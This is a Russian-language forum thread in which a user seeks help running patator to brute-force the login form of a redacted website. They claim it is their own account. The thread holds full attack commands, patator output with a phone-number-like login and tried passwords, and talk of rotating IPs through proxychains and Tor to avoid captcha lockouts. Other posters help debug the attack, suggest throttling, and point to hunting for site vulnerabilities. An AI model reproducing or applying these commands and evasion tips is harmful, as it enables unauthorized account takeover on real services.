Проблема с patator

[kasperai]

Пытаюсь за брутить свой аккаунт, но не получается. На сайте есть капча, пытался через proxychains4 и через privoxy+tor, но так же без толку.
Так же пытался через fgrep и code, тоже не получается.

patator http_fuzz url=https://-----------/cab/auth?return_uri=/cab method=POST body='return_uri=%2Fcab&login=FILE1&password=FILE0' 1=/root/login.txt 0=/root/pass.txt follow=1 -x ignore:fgrep='Неверный пароль'

17:20:40 patator    INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-10-09 17:20 MSK

17:20:40 patator    INFO -                                                                         

17:20:40 patator    INFO - code size:clen       time | candidate                          |   num | mesg

17:20:40 patator    INFO - -----------------------------------------------------------------------------

17:20:41 patator    INFO - 200  5997:6092      0.077 | 17626225577:ajl1325q                 |     1 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6003:6098      0.041 | 17626225577:jgfsjsgfjsgf           |    11 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  5999:6094      0.043 | 17626225577:jgfsjsgf               |     3 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6003:6098      0.075 | 17626225577:hjgfsjsfgjsg           |     4 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6002:6097      0.043 | 17626225577:gsfjsgfjsgf            |    10 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6002:6097      0.077 | 17626225577:sfgjgsfjgsf            |     2 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6003:6098      0.041 | 17626225577:jsgfjsgfjgfs           |    12 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  5999:6094      0.042 | 17626225577:gfhjfghj               |    13 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6001:6096      0.077 | 17626225577:fjsgfjgfsj             |     5 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6001:6096      0.048 | 17626225577:gfsjsgfjsg             |     6 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6001:6096      0.076 | 17626225577:fjsgfjgfsj             |     7 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  6003:6098      0.082 | 17626225577:sgfjsgfjgsfj           |     8 | HTTP/1.1 200 OK

17:20:41 patator    INFO - 200  5997:6092      0.048 | 17626225577:1admin                 |     9 | HTTP/1.1 200 OK

17:20:41 patator    INFO - Hits/Done/Skip/Fail/Size: 13/13/0/0/13, Avg: 21 r/s, Time: 0h 0m 0s

 

[f22]

На сайте есть капча, пытался через proxychains4 и через privoxy+tor

А как по твоему прокси должны вводить эту самую капчу, если она выскакивает каждый раз?
Patator как раз отрабатывает штатно, получая 200-ый код от страницы...

Давать советы в такой ситуации сложно, но кроме использования

Ссылка скрыта от гостей

,
либо написания собственного алгоритма и увеличения интервала времени между попытками,
на ум ничего больше не приходит.

P.S. ну и поиск уязвимостей ресурса ещё никто не отменял...

 

[kasperai]

Верно говорите, но капча появляется токо в том случае, если больше двух разов неправильно был введён пароль. Я просто думал что лучше с разных ip адресов отправлять запрос. Что-бы капча не появлялась

 

[f22]

если больше двух разов неправильно был введён пароль

Ты пробовал делать словарь из двух строк, второй строкой вбивать свой пароль.
В таком случае удаётся авторизоваться, до проверки капчи?

 

[kasperai]

Прошу прощения за свою глупость, но можете поподробнее сказать что мне нужно делать. Я не понимаю что от меня требуется.

 

[f22]

При запуске Patator'a ты указываешь параметр 1=login и 0=password, это пути файлов.

1=/root/login.txt 0=/root/pass.txt

Тебе нужно из файла паролей удалить все строки и оставить там один пароль правильный.
Тогда можно будет понять, получается ли войти с твоими учётными данными и правильно ли указаны остальные параметры.

 

[nikromikon]

Прошу прощения за свою глупость, но можете поподробнее сказать что мне нужно делать. Я не понимаю что от меня требуется.

Тест техники которую будешь применять, т.е. используешь софт на заведомо известные логин:пароль.
Если всё гуд, то вперёд и с песней в бой)

 

[kasperai]

При запуске Patator'a ты указываешь параметр 1=login и 0=password, это пути файлов.

Тебе нужно из файла паролей удалить все строки и оставить там один пароль правильный.
Тогда можно будет понять, получается ли войти с твоими учётными данными и правильно ли указаны остальные параметры.

Вот что у меня получилось

patator http_fuzz url=https://-------------/cab/auth?return_uri=/cab method=POST body='return_uri=%2Fcab&login=FILE1&password=FILE0' 1=/root/login.txt 0=/root/pass.txt follow=1 -x ignore:fgrep='Неверный пароль'
22:50:04 patator    INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-10-31 22:50 MSK
22:50:04 patator    INFO -                                                                             
22:50:04 patator    INFO - code size:clen       time | candidate                          |   num | mesg
22:50:04 patator    INFO - -----------------------------------------------------------------------------
22:50:04 patator    INFO - 200  5997:6092      0.053 | 17626225577:ajl1325q                 |     1 | HTTP/1.1 200 OK
22:50:04 patator    INFO - 200  5979:6062      0.047 | 17626225577:                       |     2 | HTTP/1.1 200 OK
22:50:04 patator    INFO - Hits/Done/Skip/Fail/Size: 2/2/0/0/2, Avg: 3 r/s, Time: 0h 0m 0s

Попробовал и с code=200, такой же результат

patator http_fuzz url=https://-------------/cab/auth?return_uri=/cab method=POST body='return_uri=%2Fcab&login=FILE1&password=FILE0' 1=/root/login.txt 0=/root/pass.txt follow=1 -x ignore:code=200
22:50:21 patator    INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-10-31 22:50 MSK
22:50:21 patator    INFO -                                                                             
22:50:21 patator    INFO - code size:clen       time | candidate                          |   num | mesg
22:50:21 patator    INFO - -----------------------------------------------------------------------------
22:50:22 patator    INFO - Hits/Done/Skip/Fail/Size: 0/2/0/0/2, Avg: 3 r/s, Time: 0h 0m 0s

Значит я делаю что-то не так

 

[f22]

Попробуй изменить строку вот так.
patator http_fuzz url=https://-------------/cab/auth?return_uri=/cab method=POST patator http_fuzz url=https://-------------/cab/auth method=POST body='return_uri=%2Fcab&login=FILE1&password=FILE0' 0=/root/pass.txt 1=/root/login.txt follow=1 -t 2 -x ignore:code=200 accept_cookie=1

Внимательнее посмотри лог подключения, нажми в браузере F12
и там окно console.
Посмотри, какие приходят данные об успешной авторизации.

Что-то мне подсказывает, что ошибка где-тотут
body='return_uri=%2Fcab&login=FILE1&password=FILE0'

 

[kasperai]

Попробуй изменить строку вот так.
patator http_fuzz url=https://-------------/cab/auth?return_uri=/cab method=POST patator http_fuzz url=https://-------------/cab/auth method=POST body='return_uri=%2Fcab&login=FILE1&password=FILE0' 0=/root/pass.txt 1=/root/login.txt follow=1 -t 2 -x ignore:code=200 accept_cookie=1

Внимательнее посмотри лог подключения, нажми в браузере F12
и там окно console.
Посмотри, какие приходят данные об успешной авторизации.

Что-то мне подсказывает, что ошибка где-тотут
body='return_uri=%2Fcab&login=FILE1&password=FILE0'

Ничего не изменилось. А в консоле ничего не пишется